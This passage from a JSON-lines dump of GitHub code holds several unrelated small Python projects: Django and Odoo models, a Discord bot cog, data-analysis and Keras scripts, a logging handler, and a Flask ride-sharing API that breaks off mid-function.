phone_number=row.get(\"phone_number\", None),\n email=row.get(\"email\", None),\n finger_print_signature=str(uuid.uuid1()),\n )\n customers.append(customer)\n num_records += 1\n\n with transaction.atomic():\n Customer.objects.bulk_create(customers, ignore_conflicts=True)\n except Exception as e:\n self.mark_failed(str(e))\n raise CreateCustomerException(\n f\"Error occured while creating customer records: \\n {str(e)}\"\n )\n else:\n self.mark_processed(num_records)\n\n def upload(self):\n self.start_date_time = datetime.datetime.now()\n customers = []\n num_records = 0\n\n try:\n with open(self.file_path, \"rb\") as f:\n decoded_file = f.read().decode(\"utf-8\").splitlines()\n reader = csv.DictReader(decoded_file)\n\n for row in reader:\n customer = Customer(\n first_name=row.get(\"first_name\", None),\n last_name=row.get(\"last_name\", None),\n national_id=row.get(\"national_id\", None),\n birth_date=row.get(\"birth_date\", None),\n address=row.get(\"address\", None),\n country=row.get(\"country\", None),\n phone_number=row.get(\"phone_number\", None),\n email=row.get(\"email\", None),\n finger_print_signature=str(uuid.uuid1()),\n )\n customers.append(customer)\n num_records += 1\n\n with transaction.atomic():\n Customer.objects.bulk_create(customers, ignore_conflicts=True)\n except Exception as e:\n self.mark_failed(str(e))\n raise CreateCustomerException(\n f\"Error occured while creating customer records: \\n {str(e)}\"\n )\n else:\n self.mark_processed(num_records)\n\n\nclass Customer(models.Model):\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n national_id = models.CharField(max_length=30)\n birth_date = models.DateField(db_index=True)\n address = models.CharField(max_length=30)\n country = models.CharField(max_length=30)\n phone_number = models.CharField(max_length=20)\n email = models.EmailField(max_length=50)\n finger_print_signature = models.CharField(max_length=50)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n indexes = [\n models.Index(fields=[\"first_name\"]),\n models.Index(fields=[\"last_name\"]),\n models.Index(fields=[\"national_id\"]),\n models.Index(fields=[\"birth_date\"]),\n models.Index(fields=[\"address\"]),\n models.Index(fields=[\"country\"]),\n models.Index(fields=[\"phone_number\"]),\n models.Index(fields=[\"email\"]),\n ]\n\n constraints = [\n models.UniqueConstraint(fields=[\"national_id\"], name=\"unique_national_id\"),\n models.UniqueConstraint(\n fields=[\"phone_number\"], name=\"unique_phone_number\"\n ),\n models.UniqueConstraint(fields=[\"email\"], name=\"unique_email\"),\n ]\n\n def __str__(self):\n return f\"Name: {self.first_name} {self.last_name}, ID: {self.national_id}\"\n\n\nclass CreateCustomerException(Exception):\n def __init__(self, message):\n super().__init__(message)\n\n\nclass FileUploadException(Exception):\n def __init__(self, message):\n super().__init__(message)\n","repo_name":"erickmwarama2/pbp_project","sub_path":"pbp_project/fileupload/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"4639171221","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Group',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('group_type', models.CharField(max_length=20, choices=[(b'editorial_group', b'Editorial Group'), (b'review_committee', b'Review Committee'), (b'generic', b'Generic')])),\n ('name', models.CharField(max_length=200)),\n ('active', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='GroupMembership',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('added', models.DateField(auto_now=True)),\n ('group', models.ForeignKey(to='manager.Group')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"StuJ/rua","sub_path":"src/manager/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"31637638670","text":"import asyncio\nimport socket\n\nfrom LIB.DB import DB\nfrom LIB.ENCRYPTOR import ENCRYPTOR\n\n\nclass SOCKET:\n def __init__(self):\n self.TASKS = []\n\n self.ENCRYPTOR = ENCRYPTOR()\n\n self.data_base = DB\n\n self.main_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n self.main_loop = asyncio.get_event_loop()\n\n async def send_data(self, data: bytes, client_socket: socket.socket):\n await self.main_loop.sock_sendall(client_socket, data)\n\n async def receive_data(self, client_socket: socket.socket) -> bytes:\n receive_data: bytes = await self.main_loop.sock_recv(client_socket, 1024)\n return receive_data\n\n async def receive_loop(self, client_socket: socket.socket = None):\n raise NotImplementedError\n\n async def send_loop(self):\n raise NotImplementedError\n\n async def main(self):\n raise NotImplementedError\n\n def start(self):\n raise NotImplementedError\n","repo_name":"Chedroni/Messanger","sub_path":"LIB/SOCKET.py","file_name":"SOCKET.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71261344635","text":"# https://www.hackerrank.com/challenges/s10-standard-deviation/problem\n\nimport math\n\nn = int(input())\nnumbers = list(map(int, input().split()))\n\nmean = sum(numbers) / n\nsquared_distances = [(num - mean) ** 2 for num in numbers]\nstd = math.sqrt(sum(squared_distances) / n)\n\nprint(\"{:.1f}\".format(std))\n","repo_name":"harshildarji/10-Days-of-Statistics","sub_path":"Day 1/standard_deviation.py","file_name":"standard_deviation.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"69989886717","text":"from matplotlib import pyplot as plt\nfrom sklearn import linear_model\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\nNUM_FEATURE = 11\n\ndef get_data():\n wine_data = np.genfromtxt('../data/winequality-white.csv',delimiter=';')\n #return np.delete(wine_data,(0),axis=0)\n \n return wine_data\n\ndef normalise(data):\n return (data - data.mean())/data.std() \n\ndef normalise_all(data):\n for i in range(NUM_FEATURE):\n data[:,i] = normalise(data[:,i])\n return data\n\ndef get_correlation_matrix(data,fig_num):\n data = np.delete(data,-1,axis=1)\n \n df = pd.DataFrame(data=data)\n \n fig = plt.figure(fig_num)\n ax = fig.add_subplot(111) \n cax = ax.matshow(df.corr())\n fig.colorbar(cax)\n return\n\ndef visualise_data(x,y,fig_num):\n sz = np.array([0.2 for x in range(len(y))])\n fig = plt.figure(fig_num)\n for i in range(NUM_FEATURE):\n ax = fig.add_subplot(2,6,i+1)\n x_norm = normalise(x[:,i])\n ax.scatter(x_norm,y,sz) \n ax.set_ylim([0,10])\n ax.set_xlim(xmin=0)\n \n return\n\ndef get_data_plot(data,fig_num):\n data = np.delete(data,(0),axis=0)\n \n x,y = np.hsplit(data,[NUM_FEATURE])\n \n visualise_data(x,y,fig_num)\n return\n\n\ndef get_corr_coef(x,y):\n coef_array = np.corrcoef(np.transpose(x),np.transpose(y)) \n return coef_array[0,1]\n \n\ndef get_data_output_correlation_plot(data,fig_num):\n data = np.delete(data,(0),axis=0)\n x,y = np.hsplit(data,[NUM_FEATURE])\n x = normalise_all(x)\n corr = np.array([get_corr_coef(x[:,i],y) for i in range(NUM_FEATURE)])\n x_axis = np.arange(NUM_FEATURE)\n\n plt.figure(fig_num)\n plt.bar(x_axis,corr)\n return\n\ndef get_output_dist(data,fig_num):\n data = np.delete(data,(0),axis=0)\n x,y = np.hsplit(data,[NUM_FEATURE])\n \n fig = plt.figure(fig_num)\n sns.distplot(np.transpose(y))\n\n return\n\ndef get_feature_dist(data,fig_num):\n data = np.delete(data,(0),axis=0)\n x,y = np.hsplit(data,[NUM_FEATURE])\n\n x = normalise_all(x)\n\n fig = plt.figure(fig_num)\n \n for i in range(NUM_FEATURE):\n ax = fig.add_subplot(2,6,i+1)\n sns.distplot(np.transpose(x[:,i]))\n \n return \n\n#TODO: find a way of removing outliers whilst preserving largest data set\ndef remove_outliers(data):\n pass\n\n''' \n x_ = [[x] for i in range(11)]\n for j in range(11): \n for i in range(len(y)):\n if int(y[i]) != j:\n x_[j].delete(i,axis=0)\n x_ = np.append(x_[int(y[i])],x[i])\n'''\n\nif __name__==\"__main__\":\n data = get_data()\n #get_lin_regr(data)\n print(len(data))\n ''' \n get_correlation_matrix(data,1)\n get_data_plot(data,2)\n get_data_output_correlation_plot(data,3)\n get_output_dist(data,4) \n get_feature_dist(data,5)\n '''\n plt.show()\n\n","repo_name":"AlexMontgomerie/ML","sub_path":"src/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"71296524797","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\nfrom odoo.tools.float_utils import float_compare\nfrom datetime import datetime, date\nfrom dateutil.relativedelta import relativedelta\nimport calendar\nimport pytz\n\nclass purchase_order_line(models.Model):\n _inherit = 'purchase.order.line'\n\n @api.onchange('product_id')\n def onchange_product_id(self):\n # print ('--ON CHANGE')\n res = super(purchase_order_line, self).onchange_product_id()\n fpos = self.order_id.fiscal_position_id\n for line in self:\n # print ('--CHECK PARTNER')\n # case1-not enable then do nothing (OK)\n # case2-enable and don't set on partner then get false (OK)\n # case3-enable and set partner tax and create directly on purchase\n # case4-enable and set partner tax and create from purchase request\n if self.env.user.company_id.is_vat_by_partner and line.order_id.partner_id:\n # print('---UPDAT TAX')\n if line.order_id.partner_id.supplier_taxes_id:\n line.taxes_id = fpos.map_tax(line.order_id.partner_id.supplier_taxes_id)\n else:\n line.taxes_id = False\n return res\n\n\nclass PurchaseOrder(models.Model):\n _inherit = 'purchase.order'\n\n # inter company rules\n @api.model\n def _prepare_sale_order_line_data(self, line, company, sale_id):\n # print('_prepare_sale_order_line_data res :', line, company, sale_id)\n res = super(PurchaseOrder, self)._prepare_sale_order_line_data(line, company, sale_id)\n # print('_prepare_sale_order_line_data res :', res)\n if sale_id:\n so = self.env[\"sale.order\"].sudo(company.intercompany_user_id).browse(sale_id)\n fpos = so.fiscal_position_id or so.partner_id.property_account_position_id\n if so.company_id.is_vat_by_partner and so.partner_id and so.partner_id.taxes_id:\n taxes = fpos.map_tax(so.partner_id.taxes_id)\n res['tax_id'] = [(6, 0, taxes.ids)]\n\n return res\n\n","repo_name":"support-itaas/app_shop","sub_path":"vat_by_partner/models/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"31062250301","text":"import collections\n\ndef RemoveDuplicates(ary):\n\n final_dict = collections.OrderedDict()\n for elem in ary:\n final_dict[elem] = 0\n return final_dict.keys()\n\nif __name__ == \"__main__\":\n ary = [1, 1, 1, 2, 2, 3, 5, 5, 7, 7, 7, 8, 9, 10, 34, 34, 56, 56, 56]\n print(RemoveDuplicates(ary))","repo_name":"suscaria/python3","sub_path":"kartik_sayee/remove_duplicates_list.py","file_name":"remove_duplicates_list.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39950992217","text":"from discord.ext import commands\nimport discord\nfrom datetime import datetime\nfrom collections import OrderedDict\n\n#consts\nthumbsUp = '\\N{THUMBS UP SIGN}'\nxButton = '❌'\nnReacts = [\n '1️⃣','2️⃣','3️⃣','4️⃣','5️⃣','6️⃣','7️⃣','8️⃣','9️⃣'\n]\nico = \"https://cdn.discordapp.com/attachments/808832489459023913/813049155957424168/unknown.png\"\n\nclass ACommands(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n #\"command\":\"desc\"\n self.commands = OrderedDict()\n self.commands['hmw'] = \"Create a homework assignment\"\n self.commands['openGroup #'] = \"Open the voice channel of specified group (# = group number)\"\n self.commands['closeGroup #'] = \"Close the voice channel of specified group (# = group number)\"\n self.messageActions = None\n\n #sends the menu in ctx if ctx is channel actions\n async def ShowCommands(self, ctx):\n if ctx.channel.name == \"actions\":\n strDsc = \"React to one of the presented options to initiate the command\"\n embedActions = discord.Embed(title=\"Available Actions\", description=strDsc, color=0xe0d122)\n embedActions.set_thumbnail(url=ico)\n i = 0\n for cmdName, cmdDsc in self.commands.items():\n embedActions.add_field(name=\"!\"+cmdName, value=nReacts[i] + \" :\" + cmdDsc + \"\\n\\n\\n\", inline=False)\n i+=1\n self.messageActions = await ctx.channel.send(embed=embedActions)\n i=0\n for cmdName in self.commands.items():\n await self.messageActions.add_reaction(nReacts[i])\n i+=1\n \n @commands.command()\n async def actions(self, ctx):\n await self.ShowCommands(ctx)\n \n @commands.Cog.listener()\n #reaction listener\n async def on_reaction_add(self, reaction, user):\n if reaction.message == self.messageActions and not user.bot:\n await reaction.remove(user)\n index = nReacts.index(reaction.emoji)\n command = list(self.commands.items())[index][0]\n found = False\n for cmd in self.bot.commands:\n if cmd.name == command: \n found = True\n break \n else: continue\n if found == False:\n await reaction.message.channel.send(xButton + \" incorrect bot command provided\")\n else:\n await cmd.__call__(reaction.message.channel)\n\n \n","repo_name":"william-fecteau/Chelper","sub_path":"cogs/actionCommands.py","file_name":"actionCommands.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"70859431042","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 10 23:55:52 2020\n\n@author: Dicken\n\"\"\"\n\n# Importer les librairies nécessaires \nimport matplotlib.pyplot as plt # visualiser des données sous formes de graphiques\nimport numpy as np # manipuler des matrices ou tableaux \nimport pandas as pd # analyse, nettoyage et préparation des données\nimport seaborn as sns # création de tracés statistiques communs\n#scikit-learn\nimport sklearn\n# Importation dataset\n#data = pd.read_csv('bank-full.csv', sep=';') // Premier dataset avec 45.000 observations\ndata = pd.read_csv('bank.csv')\ndata.rename(columns={'deposit': 'y'}, inplace=True)\n\n# Variables independantes\nX = data.iloc[:, :-1].values\n\n# Variables dependantes\ny = data.iloc[:, -1].values\n\n# Encoding the Independent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\n# Variable independante\nlabelencoder_y = LabelEncoder()\ny = labelencoder_y.fit_transform(y)\n\n# Variables dependantes a coder en 0 et 1\n\n# Variable default\nlabelencoder_X_default = LabelEncoder()\nX[:, 4] = labelencoder_X_default.fit_transform(X[:, 4])\n\n# Variable housing\nlabelencoder_X_housing = LabelEncoder()\nX[:, 6] = labelencoder_X_housing.fit_transform(X[:, 6])\n\n# Variable loan\nlabelencoder_X_loan = LabelEncoder()\nX[:, 7] = labelencoder_X_loan.fit_transform(X[:, 7])\n\n# Variables a coder en plusieurs\n# Utilisation OneHotEncoder() et columnTransform\nlabelencoder_X_job = LabelEncoder()\nX[:, 1] = labelencoder_X_job.fit_transform(X[:, 1])\n\n# Utilisation OneHotEncoder() et columnTransform\nlabelencoder_X_marital = LabelEncoder()\nX[:, 2] = labelencoder_X_marital.fit_transform(X[:, 2])\n\nlabelencoder_X_education = LabelEncoder()\nX[:, 3] = labelencoder_X_education.fit_transform(X[:, 3])\n\nlabelencoder_X_contact = LabelEncoder()\nX[:, 8] = labelencoder_X_education.fit_transform(X[:, 8])\n\nlabelencoder_X_month = LabelEncoder()\nX[:, 10] = labelencoder_X_education.fit_transform(X[:, 10])\n\nlabelencoder_X_poutcome = LabelEncoder()\nX[:, 15] = labelencoder_X_education.fit_transform(X[:, 15])\n\n#t = X.select_dtypes(exclude=['int64'])\n\n\ncolumtransform = ColumnTransformer(\n [('one_hot_encoder', OneHotEncoder(), [1, 2, 3, 8, 10, 15])], # The column numbers to be transformed (here is [0] but can be [0, 1, 3])\n remainder='passthrough' # Leave the rest of the columns untouched\n)\n\nX = np.array(columtransform.fit_transform(X), dtype=np.float)\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\nprint (X_train)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n# Initialiser le reseau\nclassifier = Sequential()\n\nclassifier.add(Dense(units=8, activation=\"relu\", kernel_initializer=\"uniform\", input_dim=48))\n\n# deuxieme couche cachée\nclassifier.add(Dense(units=8, activation=\"relu\", kernel_initializer=\"uniform\"))\n\n# Couche de sortie\nclassifier.add(Dense(units=1, activation=\"sigmoid\", kernel_initializer=\"uniform\"))\n\n# Compiler le reseau le neurone\nclassifier.compile(optimizer='adam', loss=\"binary_crossentropy\", metrics=[\"accuracy\"])\n\n# resume du model\nprint(classifier.summary())\n\n# Entrainer le reseaux de neurone\nclassifier.fit(X_train, y_train, batch_size=10, epochs=1000)\n\n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\n\n# Classifier avec un seuil de 50%\ny_pred= (y_pred > 0.5)\n\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n","repo_name":"D-kn/Data-Mining-Project_Bank-Marketing","sub_path":"ANN_FD.py","file_name":"ANN_FD.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"98"} +{"seq_id":"25043106408","text":"def potion(hp, pot):\n if hp + pot > 100:\n healing_amount = 100 - hp\n else:\n healing_amount = pot\n hp += healing_amount\n print(f\"You healed for {healing_amount} hp.\")\n print(f\"Current health: {hp} hp.\")\n return hp\n\n\ndef chest(coins, treasure):\n if treasure > 0:\n coins += treasure\n print(f\"You found {treasure} bitcoins.\")\n return coins\n\n\ndef fight(hp, monster_name, monster_damage, room):\n if hp - monster_damage <= 0:\n print(f\"You died! Killed by {monster_name}.\\nBest room: {room + 1}\")\n exit()\n hp -= monster_damage\n print(f\"You slayed {monster_name}.\")\n return hp\n\n\nhealth = 100\nbitcoins = 0\nlevels = input().split(\"|\")\n\nfor level in range(len(levels)):\n event = levels[level].split()\n command, number = event[0], int(event[1])\n\n if command == \"potion\":\n health = potion(health, number)\n elif command == \"chest\":\n bitcoins = chest(bitcoins, number)\n else:\n health = fight(health, command, number, level)\nelse:\n print(\"You've made it!\")\n print(f\"Bitcoins: {bitcoins}\\nHealth: {health}\")\n","repo_name":"PaolaG365/PythonCourses","sub_path":"PythonFundamentalsMay2023/MidExams/Mu_online.py","file_name":"Mu_online.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"5623799998","text":"from puzzle import Puzzle\n\nclass P3(Puzzle):\n\n def __init__(self, part):\n Puzzle.__init__(self, 3, part)\n \n def priorite_lettre(self, lettre):\n code = ord(lettre)\n code_a = ord('a')\n code_A = ord('A')\n return code - code_A + 27 if code < code_a else code - code_a + 1\n \n def solve_a(self, filename):\n total = 0\n with open(filename) as datas:\n for ligne in datas:\n m = len(ligne) // 2\n s = set(ligne[:m]) & set(ligne[m:-1])\n total += self.priorite_lettre(s.pop())\n return total\n \n def solve_b(self, filename):\n total = 0\n with open(filename) as datas:\n ligne = datas.readline()\n while ligne:\n s = set(ligne.strip())\n for _ in range(2):\n s = s & set(datas.readline().strip())\n total += self.priorite_lettre(s.pop())\n ligne = datas.readline()\n return total\n \n def solve(self, filename):\n if self.part == 0:\n self.solution = self.solve_a(filename)\n else:\n self.solution = self.solve_b(filename)\n\np3one = P3(0)\np3one.validate()\np3two = P3(1)\np3two.validate()","repo_name":"sebhoa/aoc","sub_path":"2022/p03.py","file_name":"p03.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"43218936066","text":"import os\nimport json\nimport datetime\nfrom madliar.http.response import HttpResponse\n\nfrom etc.config import LOG_PATH\nfrom etc.log4 import logging\n\n\nclass supported_action(object):\n ActionDoesNotExisted = type(\"supported_action__ActionDoesNotExisted\", (Exception, ), {})\n __function = {}\n\n def __init__(self, action):\n self.__action = action\n\n def __call__(self, func):\n self.__class__.__function[self.__action] = func\n return func\n\n @classmethod\n def run(cls, action, *args, **kwargs):\n picked_func = cls.__function.get(action)\n if callable(picked_func):\n return picked_func(*args, **kwargs)\n else:\n raise cls.ActionDoesNotExisted\n\n\ndef record(request):\n if request.method.lower() != \"post\":\n return HttpResponse(\"\")\n\n action = request.POST.get(\"action\")\n try:\n http_response = supported_action.run(action, request)\n except supported_action.ActionDoesNotExisted:\n http_response = HttpResponse(\"Action does not support.\")\n\n return http_response\n\n\n@supported_action(\"chat_log\")\ndef add_chat_log(request):\n room_id = request.POST.get(\"room_id\")\n try:\n raw_msg_list = request.POST.get(\"msg_list\")\n msg_list = json.loads(raw_msg_list)\n except Exception as e:\n return HttpResponse(\"ERROR: %s\" % e)\n\n log_contents = []\n for msg in msg_list:\n datetime_str = msg.get(\"datetime_str\")\n user = msg.get(\"user\")\n ul = msg.get(\"ul\")\n decoration = msg.get(\"decoration\")\n dl = msg.get(\"dl\")\n raw_msg = msg.get(\"msg\")\n if not user or not raw_msg:\n continue\n\n log_contents.append(\n \"[%s][%-5s][%s %s] %s -> %s\\n\" % (datetime_str, ul, decoration, dl, user, raw_msg)\n )\n if not log_contents:\n return HttpResponse(\"\")\n\n file_name = os.path.join(LOG_PATH, \"chat_%s.log\" % room_id)\n content = \"\".join(log_contents).strip(\"\\n\")\n if not isinstance(content, unicode):\n content = content.decode(\"utf-8\", errors=\"replace\")\n with open(file_name, \"ab\") as f:\n print >> f, content.encode(\"utf-8\", errors=\"replace\")\n return HttpResponse(content)\n\n\n@supported_action(\"prize_log\")\ndef add_prize_log(request):\n try:\n count = int(request.POST.get(\"count\"))\n except Exception:\n return HttpResponse(\"Error count\")\n datetime_str = str(datetime.datetime.now())[:-3]\n provider = request.POST.get(\"provider\")\n prize_type = request.POST.get(\"type\")\n title = request.POST.get(\"title\")\n p_url = request.POST.get(\"url\")\n\n file_name = os.path.join(LOG_PATH, \"prize_accept.log\")\n content = \"[%s][%s][%s][%s][%s][%s]\" % (datetime_str, count, prize_type, provider, p_url, title)\n if not isinstance(content, unicode):\n content = content.decode(\"utf-8\", errors=\"replace\")\n with open(file_name, \"ab\") as f:\n print >> f, content.encode(\"utf-8\", errors=\"replace\")\n return HttpResponse(content)\n","repo_name":"cl-ei/madliar.com","sub_path":"application/recored.py","file_name":"recored.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"41377130687","text":"#!/usr/bin/env python\nimport os\nfrom flask import Flask, request, jsonify, make_response\nfrom flask import render_template, redirect, url_for, abort\nfrom flask_sqlalchemy import SQLAlchemy\nimport uuid\nfrom werkzeug.security import generate_password_hash, check_password_hash\nimport datetime\nfrom functools import wraps\nfrom sqlalchemy import Column, Integer, DateTime\nimport re\nimport requests\nimport json\nimport pandas as pd\nimport flask\n#count of read requests\ndic ={\"count\" :0}\nwith open('count.json', 'w') as json_file:\n json.dump(dic, json_file)\nip_addr=\"http://3.220.27.213\"\ndf=pd.read_csv(\"locdb.csv\")\nd=dict(zip(df['Area No'],df['Area Name']))\napp = Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\nres=app.test_client()\napp.config['SECRET_KEY'] = 'thisissecret'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'tutorial.db')\ndb = SQLAlchemy(app)\nheaders={\"Content-Type\":\"application/json\"}\nclass MyDateTime(db.TypeDecorator):\n\timpl = db.DateTime\n\tdef process_bind_param(self, value, dialect):\n\t\tif type(value) is str:\n\t\t\treturn datetime.datetime.strptime(value, '%d-%m-%Y:%S-%M-%H')\n\t\treturn value\n\n#CREATING USER\nclass User(db.Model):\n\tid = db.Column(db.Integer, primary_key=True)\n\tname = db.Column(db.String(50))\n\tpassword = db.Column(db.String(80))\n\n#CREATING RIDER\nclass Rider(db.Model):\n\tid = db.Column(db.Integer, primary_key=True)\n\tcreated_by = db.Column(db.String(50))\n\ttimestamp = db.Column(MyDateTime, default=datetime.datetime.now)\n\tsource = db.Column(db.Integer)\n\tdestination = db.Column(db.Integer)\n\nclass Shared(db.Model):\n\tid = db.Column(db.Integer, primary_key=True)\n\tride_id = db.Column(db.Integer)\n\tshared_by = db.Column(db.String(50))\n\n\n#API:3\n@app.route('/api/v1/rides', methods=['POST'])\ndef create_rider():\n\tdata = request.get_json(force=True)\n\tdf=list()\n\tmessage = requests.get(\"http://USERandRide-254276649.us-east-1.elb.amazonaws.com/api/v1/users\",headers={\"Origin\":\"3.220.27.213\"})\n\t#return message.text\n\tfor x in message.text[1:-1].split(', '):\n\t\tdf.append(x[1:-1])\n\t#return str(df[1])\n\tif request.method == 'POST':\n\t\tif data['created_by'] in df:\n\t\t\trequests.post(ip_addr+\"/api/v1/db/write\", json ={\"api\":\"3\",\"created_by\":data['created_by'], \"timestamp\":data['timestamp'], \"source\":data['source'], \"destination\":data['destination']},headers=headers)\n\t\t\tstatus_code = flask.Response(status=201)\n\t\t\treturn status_code\n\t\telse:\n\t\t\tabort(400)\n\telse:\n\t\tabort(405)\n\n#API:4\n@app.route('/api/v1/rides', methods=['GET'])\ndef upcoming_rides():\n\twith app.test_client() as client:\n\t\tresponse = client.get('/')\n\t\tif response.status_code==405:\n\t\t\tabort(str(response.status_code))\n\tsource=int(request.args.get('source'))\n\tdestination=int(request.args.get('destination'))\n\tif(source<1 and source>198 and destination<1 and destination>198 ):\n\t\tabort(400)\t\n\tread_data = requests.post(ip_addr+\"/api/v1/db/read\",json={\"api\":\"4\"})\n\tread_data = read_data.json()\n\t# return jsonify(read_data)\n\tupcoming = []\n\tcurrent_time = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\tcurrent_time = datetime.datetime.now().strptime(current_time,\"%Y-%m-%d %H:%M:%S\")\n\tfor i in range(len(read_data[\"created_by\"])):\n\t\ttime1 = datetime.datetime.strptime(read_data['timestamp'][i],\"%a, %d %b %Y %H:%M:%S %Z\" )\n\t\tif(source == read_data['source'][i] and destination == read_data['destination'][i] and time1>current_time):\n\t\t\ttime1 = datetime.datetime.strptime(read_data['timestamp'][i],\"%a, %d %b %Y %H:%M:%S %Z\" )\n\t\t\ttime =datetime.datetime.strftime(time1,\"%d-%m-%Y:%S-%M-%H\")\n\t\t\tupcoming.append({\"rideId\":read_data['rideId'][i],\"username\":read_data['created_by'][i],\"timestamp\":time})\n\tif(len(upcoming)!=0):\n\t\treturn jsonify(upcoming)\t\n\telif(len(upcoming)==0):\n\t\tstatus_code = flask.Response(status=204)\n\t\treturn status_code\n\telse:\n\t\tabort(400)\n\n\n#API:5,6,7\n@app.route('/api/v1/rides/',methods=['GET','DELETE','POST'])\ndef list_ride(ride_id):\n\tif request.method == 'GET':\n\t\tif db.session.query(Rider).filter_by(id=ride_id).count():\n\t\t\tr=requests.post(ip_addr+\"/api/v1/db/read\", json ={\"api\":\"5\",\"ride_id\":ride_id},headers=headers)\n\t\t\treturn r.json()\n\t\telse:\n\t\t\tstatus_code = flask.Response(status=204)\n\t\t\treturn status_code\n\telif request.method == 'POST':\n\t\tdf=list()\n\t\tmessage = requests.get(\"http://USERandRide-254276649.us-east-1.elb.amazonaws.com/api/v1/users\",headers={\"Origin\":\"3.220.27.213\"})\n\t\t#return message.text\n\t\tfor x in message.text[1:-1].split(', '):\n\t\t\tdf.append(x[1:-1])\n\t\t#return str(df)\n\t\t#return request.get_json(force=True)['username']\n\t\tif db.session.query(Rider).filter_by(id=ride_id).count() and request.get_json(force=True)['username'] in df:\n\t\t\trequests.post(ip_addr+\"/api/v1/db/write\", json ={\"api\":\"6\",\"ride_id\":ride_id,\"shared_by\":request.get_json(force=True)['username']},headers=headers)\n\t\t\tstatus_code = flask.Response(status=201)\n\t\t\treturn status_code\n\t\telse:\n\t\t\tabort(400)\n\telif request.method == 'DELETE':\n\t\tif db.session.query(Rider).filter_by(id=ride_id).count():\n\t\t\trequests.post(ip_addr+\"/api/v1/db/write\",json={\"api\":\"7\",\"ride_id\":ride_id})\n\t\t\tstatus_code = flask.Response(status=200)\n\t\t\treturn status_code\n\t\telse:\n\t\t\tstatus_code = flask.Response(status=204)\n\t\t\treturn status_code\n\telse:\n\t\tabort(405)\n\n#API:8\n@app.route('/api/v1/db/write', methods=['POST'])\ndef write_db():\n\tdata = request.get_json(force=True)\n\tif(data['api']==\"3\"):\n\t\tnew_rider= Rider( created_by=data['created_by'], timestamp=data['timestamp'], source=data['source'], destination=data['destination'])\n\t\tdb.session.add(new_rider)\n\t\tdb.session.commit()\n\tif(data['api']==\"6\"):\n\t\tnew_shared = Shared(ride_id=data['ride_id'],shared_by=data['shared_by'])\n\t\tdb.session.add(new_shared)\n\t\tdb.session.commit()\n\tif(data['api']==\"7\"):\n\t\trider_delete= db.session.query(Rider).filter_by(id=data['ride_id']).one()\n\t\tdb.session.delete(rider_delete)\n\t\tdb.session.commit()\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = json.load(jsonFile)\n\tdata[\"count\"] =data[\"count\"]+1\n\twith open(\"count.json\", \"w\") as jsonFile:\n\t\tjson.dump(data, 